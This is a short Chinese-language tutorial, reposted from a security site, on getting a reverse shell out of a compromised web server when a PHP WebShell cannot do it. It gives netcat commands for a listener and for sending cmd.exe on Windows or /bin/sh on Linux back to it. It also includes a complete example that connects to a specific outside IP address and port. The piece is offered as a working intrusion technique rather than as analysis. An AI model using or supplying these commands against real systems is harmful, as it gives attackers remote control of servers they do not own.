使用NC反弹Shell

在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。

在Windows下反弹CmdShell时,首先要在本机运行”nc -vv -l -p 端口号”监听端口,然后在WebShell中执行”nc -e cmd.exe 监听主机IP地址  端口”,就可以反弹一个CmdShell。这个方法在Linux中仍然可行,只不过需要作一点小小的改动。

–在本机监听端口后,在WebShell运行nc反弹时,需要发送的是”/bin/sh”,而不是cmd.exe,这样才够反弹发送一个Linux下的Shell命令行窗口给监听主机。例如执行如下命令:

nc 119.1.44.32 8888 -e /bin/sh 即可反弹一个Shell到IP地址为119.1.44.32的监听主机的8888端口。

本文摘自网络网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.转载本文请著名原文地址及版权信息。